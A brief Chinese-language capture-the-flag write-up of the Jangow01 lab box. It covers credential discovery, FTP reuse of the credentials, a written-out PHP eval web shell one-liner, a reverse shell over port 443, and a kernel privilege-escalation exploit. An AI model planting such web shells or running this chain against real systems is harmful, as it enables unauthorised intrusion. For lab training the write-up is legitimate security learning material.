0%

学长的任务罢了1-jangow01

  • 扫描打点

    关于 CMSexploitdb 出来的两个漏洞都不能用

    dirsearch 扫出来 .backup ,拿到用户名和密码

    jangow01:abygurl69

    但好像是数据库的密码?但没对外开放数据库,看看有没有刚见过的密码复用

    连连 ftp 试试:

    var/www/html 下翻一翻,找到这个,能命令执行:

  • getshell

    命令执行传一句话 echo '<?php @eval($_POST['qwq']); ?>' >> qwq.php

    蚁剑连一下,然后转 msf

    但这里反弹 shell 一直失败

    换用 443 端口

    原因在这里

    然后提示 su: must be run from a terminal

    搜到这篇文章 ,要用 python 调用本地 shell

    然后继续密码复用就提权了

    这里有一个观测可行端口的办法

  • Linux 内核提权

    学长提示对于老机器都可以搜一下内核

    发现正好可以用

    拿蚁剑传上去,gcc 编译一下,执行生成的 a.out 就行